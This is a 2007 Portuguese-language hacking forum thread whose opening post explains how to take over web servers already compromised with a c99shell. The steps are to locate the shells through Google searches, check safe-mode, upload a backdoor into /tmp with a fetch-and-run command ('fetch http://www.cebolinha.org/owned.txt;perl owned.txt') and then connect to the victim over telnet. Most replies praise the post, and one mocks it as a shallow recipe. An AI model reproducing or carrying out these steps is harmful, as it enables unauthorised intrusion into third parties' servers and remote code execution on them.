PHP Injection - Ownando uma Shell

Started by Anonymous, 24 de April , 2007, 09:53:42 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Anonymous

Olá,
aqui mostrarei com imagens alguns macetes para se ownar uma Shell.
Eu scaniei pelo site do Google mesmo, coloquei o nome de uma CMD.



Repare aonde eu circulei, isso mostra que o site já está com o c99shell (CMD usada),
assim eu abro ela..



Já nessa segunda imagem é a CMD no site, mais este ainda não é bom para ownar,
Veja que o Safe-mode: ON (secure).
Logo não é ownavel!

Em outra busca eu acho uma em que está em Safe-mode: OFF
está é boa..
então eu abro o arquivo /tmp/ ali no ":: Go Dir ::"



Agora você vê que tem bastante arquivos na pasta, porque esta é a pasta principal da Shell,



Agora é upar a Backdoor..



só um detalhe que não apareceu para fazer a shell upar algum arquivo seu
precisa de um comando antes, aí varia de shell para shell,
vou por os mais conhecidos: wget, fetch, lwp-download, get..
Não se esquecendo que alguns desses comandos precisa fazer o perl arquivo.extensão
para upar no "Enter:"
Exemplo:

fetch http://www.cebolinha.org/owned.txt
perl owned.txt

Ou ainda você pode juntar os dois em um comando só:

fench http://www.cebolinha.org/owned.txt;perl owned.txt

Última imagem, e esta é a que vocês precisam tomar maior cuidado,



Esta shell já está rooteada, isto é: você não vai conseguir ownar,
muito menos rootear.
E você tentando fazer isso, o dono desta pode pegar seu IP e te mandar uns packets para você ficar esperto. :P
Depois que você fizer o up da backdoor, você vai abrir Telnet com ela,
usando o mesmo exemplo da imagem:
Execultar (botão do windows+r) telnet st116.startlogic.com 1666
No caso ali o st116.startlogic.com seria o IP da vítima!
Agora é só se divertir, ou ainda ir além e tentar rootear.
Mais isso vai de você, tem alguns tópicos bons de root aqui no fórum,
dêem uma pesquisada!

Espero ter esclarecido as dúvidas, mais se tiver alguma postem aqui!

Anonymous

Uma super expplicação, sem enrolação, chegou onde devia...Parabéns...
Quando tiver mais tempo vou estudar mais a respeito.

abobre

Sinceramente vc esta de parabéns darklife, seu artigo ficou muito bem resumido e vc conseguiu em poucas palavras esclarecer mtas duvidas que alguns users venham a ter.

 Parabéns e sempre continue contribuindo com o fórum !

Anonymous

Eu fico muito feliz por ver que o povo está gostando dos meus tópicos..
eu me registrei aqui ontem, mais pretendo me firmar aqui!
Se tiverem dúvidas ao assunto postem aqui que eu vou tentar ajudar.

wlvv

nao sei muito disso nao mais a pasta principal eh a root

a tmp eh que eh a "pasta pa owna o baguio" pq qualquer um pode

editar um arquivo e/ou fazer downloads e etc..

Anonymous

Sim,
/root/
/var/

tem várias importantes,
acontece que essa é a mais importante pra ownar shell..
só um detalhe,
você pode mecher nessa pasta se estiver em safe-mode off,
se estiver on você não consegue alterar.

HadeS

Bah, na boa.

Mais uma receita de bolo. Você não ownou nada maluco! Você procurou no Google por servidores com Web Shells upadas cara, das várias toscas receitas de bolo que já vi, essa foi a pior.

"Rootear"? Pelo amor de deus. Aaaaahhhh, depois dessa vou pro banheiro cagar no piniquinho.

lol

HadeS

HadeS

Detalhe:

QuoteEsta shell já está rooteada, isto é: você não vai conseguir ownar,
muito menos rootear.

O que quiz dizer com isso?!? Você diz que já tá "rooteada", e por isso não vai consegui "rootear"?!? Rootear = conseguir acesso root? Se for, não, não está "rooteada". E dá sim pra "rootear" ela, basta você arrumar um exploit que sirva.

Não sei porque ainda perco meu tempo com isso...

Obs: Desculpa o post duplo.

HadeS